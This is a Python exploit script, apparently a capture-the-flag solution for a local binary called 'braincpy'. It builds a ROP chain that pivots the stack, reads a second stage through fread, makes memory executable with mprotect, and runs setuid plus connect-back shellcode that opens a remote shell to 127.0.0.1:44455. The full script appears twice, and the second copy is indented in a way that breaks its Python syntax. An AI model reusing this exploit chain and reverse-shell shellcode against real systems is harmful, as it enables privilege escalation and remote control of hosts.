otms61/braincpy.py

## braincpy.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct
from subprocess import Popen, PIPE


def p(a):
    return struct.pack("<I", a)

# 0x080df815: add esp, dword [ebp+0x0A] ; ret  ;  (1 found)
add_esp = 0x080df815

# gdb-peda$ find 0xffffffa0
# Searching for '0xffffffa0' in: None ranges
# Found 1 results, display max 1 items:
# braincpy : 0x8086c1c (<trecurse+92>:    mov    al,ds:0x89ffffff)
neg_0x60 = 0x8086c1c

# 080a94c0 <fread_unlocked>:
libc_fread = 0x80a94c0

# 0805a5a0 <__mprotect>:
mprotect = 0x805a5a0

# 080e5080 <_IO_2_1_stdin_>:
io_stdin = 0x80e5080

data_addr = 0x080e6030
pop4ret = 0x80489db
pop3ret = 0x80489dc
leaveret = 0x80481d1
# 0x080483a8: pop ebp ; ret  ;  (806 found)
pop_ebp_ret = 0x080483a8

payload = p(libc_fread)
payload += p(pop4ret)
payload += p(data_addr)
payload += p(0x11111111)
payload += p(0x11111111)
payload += p(io_stdin)

payload += p(pop_ebp_ret)
payload += p(data_addr-4)
payload += p(leaveret)
payload += 'a' * (0x60 - 8 - len(payload))
payload += p(neg_0x60 - 0xa)
payload += p(add_esp)

process = Popen(['./braincpy', payload], stdin=PIPE)

# 6a 17                   push   0x17
# 58                      pop    eax
# 68 e8 03 00 00          push   0x3e8
# 5b                      pop    ebx
# cd 80                   int    0x80
setuid = "\x6a\x17\x58\x68\xe8\x03\x00\x00\x5b\xcd\x80"

# x86/linux/connect: 70 bytes
# port=44455, host=127.0.0.1
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
    "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68"
    "\xad\xa7\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
    "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xb0\x0b\xcd\x80"
)

payload2 = ''
payload2 += p(mprotect)
payload2 += p(pop3ret)
payload2 += p(0x080e4000)
payload2 += p(0x4000)
payload2 += p(0x7)
payload2 += p(data_addr+24)
payload2 += setuid + shellcode
process.stdin.write(payload2)
	#!/usr/bin/python
	# -- coding: utf-8 --
	import struct
	from subprocess import Popen, PIPE


	def p(a):
	return struct.pack("<I", a)

	# 0x080df815: add esp, dword [ebp+0x0A] ; ret ; (1 found)
	add_esp = 0x080df815

	# gdb-peda$ find 0xffffffa0
	# Searching for '0xffffffa0' in: None ranges
	# Found 1 results, display max 1 items:
	# braincpy : 0x8086c1c (<trecurse+92>: mov al,ds:0x89ffffff)
	neg_0x60 = 0x8086c1c

	# 080a94c0 <fread_unlocked>:
	libc_fread = 0x80a94c0

	# 0805a5a0 <__mprotect>:
	mprotect = 0x805a5a0

	# 080e5080 <_IO_2_1_stdin_>:
	io_stdin = 0x80e5080

	data_addr = 0x080e6030
	pop4ret = 0x80489db
	pop3ret = 0x80489dc
	leaveret = 0x80481d1
	# 0x080483a8: pop ebp ; ret ; (806 found)
	pop_ebp_ret = 0x080483a8

	payload = p(libc_fread)
	payload += p(pop4ret)
	payload += p(data_addr)
	payload += p(0x11111111)
	payload += p(0x11111111)
	payload += p(io_stdin)

	payload += p(pop_ebp_ret)
	payload += p(data_addr-4)
	payload += p(leaveret)
	payload += 'a' * (0x60 - 8 - len(payload))
	payload += p(neg_0x60 - 0xa)
	payload += p(add_esp)

	process = Popen(['./braincpy', payload], stdin=PIPE)

	# 6a 17 push 0x17
	# 58 pop eax
	# 68 e8 03 00 00 push 0x3e8
	# 5b pop ebx
	# cd 80 int 0x80
	setuid = "\x6a\x17\x58\x68\xe8\x03\x00\x00\x5b\xcd\x80"

	# x86/linux/connect: 70 bytes
	# port=44455, host=127.0.0.1
	shellcode = (
	"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
	"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68"
	"\xad\xa7\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
	"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
	"\x89\xe1\xb0\x0b\xcd\x80"
	)

	payload2 = ''
	payload2 += p(mprotect)
	payload2 += p(pop3ret)
	payload2 += p(0x080e4000)
	payload2 += p(0x4000)
	payload2 += p(0x7)
	payload2 += p(data_addr+24)
	payload2 += setuid + shellcode
	process.stdin.write(payload2)